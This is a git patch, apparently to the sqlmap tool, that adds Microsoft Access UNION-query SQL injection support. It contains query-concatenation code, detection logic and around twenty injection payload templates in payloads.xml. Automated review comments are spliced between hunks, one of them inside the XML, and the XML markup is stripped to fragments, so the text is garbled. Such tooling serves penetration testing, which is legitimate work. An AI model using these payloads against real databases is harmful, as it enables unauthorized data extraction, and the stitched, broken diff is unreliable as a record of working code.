From 067354b97f5010118c623df4168dd3676a82ef92 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Thu, 7 Jul 2011 13:20:40 +0000
Subject: [PATCH] Revert of last commit and proper fix to detect UNION query SQL injection against Microsoft Access

---
 lib/core/agent.py | 16 ++
 lib/core/settings.py | 2 +-
 lib/techniques/union/test.py | 6 +-
 xml/payloads.xml | 396 +++++++++++++++++++++++++++++++++++
 4 files changed, 417 insertions(+), 3 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index b4cf4cbba..c1ba3833d 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -500,6 +500,22 @@ class Agent:
 elif fieldsNoSelect:
 concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
 
+ elif Backend.isDbms(DBMS.ACCESS):
+ if fieldsExists:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsSelectCase:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&(SELECT " % kb.misc.start, 1)
+ concatenatedQuery += ")&'%s'" % kb.misc.stop
+ elif fieldsSelectFrom:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery = concatenatedQuery.replace(" FROM ", "&'%s' FROM " % kb.misc.stop, 1)
+ elif fieldsSelect:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsNoSelect:
+ concatenatedQuery = "'%s'&%s&'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
+
 else:
 concatenatedQuery = query
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4758392f9..3bb7983a5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
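Review bot: The new `elif Backend.isDbms(DBMS.ACCESS):` branch appears to be a line-for-line copy of the branch ending just above it with `+` swapped for `&`, so the two DBMS paths now carry duplicate copies of the case-sensitive, first-occurrence `replace("SELECT ", …, 1)` and `replace(" FROM ", …, 1)` rewrites and will drift apart on the next fix. Selecting the operator once, e.g. `concatOperator = "&" if Backend.isDbms(DBMS.ACCESS) else "+"`, and sharing a single branch body would remove the duplication. Within the new branch the `fieldsExists` and `fieldsSelect` arms produce exactly the same rewrite, so either the distinction is intentional and deserves a one-line comment, or the two arms can be merged. The enclosing method starts before this hunk.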
@@ -183,7 +183,7 @@ USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" )
 
 FROM_TABLE = {
 DBMS.ORACLE: " FROM DUAL",
- DBMS.ACCESS: " FROM MSysAccessObjects%00",
+ DBMS.ACCESS: " FROM MSysAccessObjects",
 DBMS.FIREBIRD: " FROM RDB$DATABASE",
 DBMS.MAXDB: " FROM VERSIONS",
 DBMS.DB2: " FROM SYSIBM.SYSDUMMY1"
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 1796b2e21..a883d3b51 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -121,6 +121,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
 for position in positions:
 # Prepare expression with delimiters
 randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
 randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
 randQueryUnescaped = unescaper.unescape(randQueryProcessed)
 
@@ -134,13 +135,14 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
 removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
 payload, True) or "")
 
- if content and randQuery in content:
+ if content and phrase in content:
 validPayload = payload
 vector = (position, count, comment, prefix, suffix, kb.uChar, where)
 
 if where == PAYLOAD.WHERE.ORIGINAL:
 # Prepare expression with delimiters
 randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
 randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
 randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
 
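Review bot: On the added `phrase = "%s%s%s".lower() % (…)` line the `.lower()` is applied to the literal format template before interpolation, so it never touches `kb.misc.start`, `randQuery` or `kb.misc.stop`; the added `phrase2` line in the following hunk has the same shape. The existing `content = "%s%s".lower() % (…)` in the last hunk of this file has the same quirk, so both sides of the comparison stay un-lowercased and the match still works, but the call reads as a case-insensitive comparison that does not happen. Either drop `.lower()` from both new lines, or lowercase the interpolated values on both sides, e.g. `phrase = ("%s%s%s" % (kb.misc.start, randQuery, kb.misc.stop)).lower()` with the same treatment applied to `content`. `__unionPosition` starts before this hunk and continues after it.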
@@ -152,7 +154,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
 page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
 content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
 
- if content and ((randQuery in content and randQuery2 not in content) or (randQuery not in content and randQuery2 in content)):
+ if content and ((randQuery in content and phrase2 not in content) or (randQuery not in content and phrase2 in content)):
 vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
 
 unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError()
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 426dd4d89..a5af03428 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2893,6 +2893,402 @@ Formats:
+ + Microsoft Access UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + [COLSTART]-[COLSTOP] + + + + +
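Review bot: The updated condition still compares the bare `randQuery` against `content` while the other side of the exclusive-or now uses the delimited `phrase2`, so the two arms are no longer symmetric: a copy of `randQuery` echoed back without the `kb.misc.start`/`kb.misc.stop` delimiters satisfies the first arm, whereas the earlier hunk apparently switched the ORIGINAL-case test to `phrase in content` precisely to require the delimiters. Assuming the `phrase` bound earlier in the same loop iteration is still in scope here, the line should read `if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):`. `__unionPosition` continues outside this hunk.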
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + [COLSTART]-[COLSTOP] + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([CHAR]) - 1 to 10 columns + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 1-10 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - 1 to 10 columns + 3 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 1-10 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - 1 to 10 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 1-10 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([CHAR]) - 11 to 20 columns + 3 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 11-20 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - 11 to 20 columns + 3 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 11-20 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - 11 to 20 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 11-20 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([CHAR]) - 21 to 30 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 21-30 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - 21 to 30 columns + 3 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 21-30 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - 21 to 30 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 21-30 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([CHAR]) - 31 to 40 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 31-40 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - 31 to 40 columns + 3 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 31-40 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - 31 to 40 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 31-40 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([CHAR]) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [CHAR] + 41-50 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query (NULL) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + NULL + 41-50 + + + + +
+ Microsoft Access +
+
+ + + Microsoft Access UNION query ([RANDNUM]) - 41 to 50 columns + 3 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + %00 + [RANDNUM] + 41-50 + + + + +
+ Microsoft Access +
+
+ Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) 3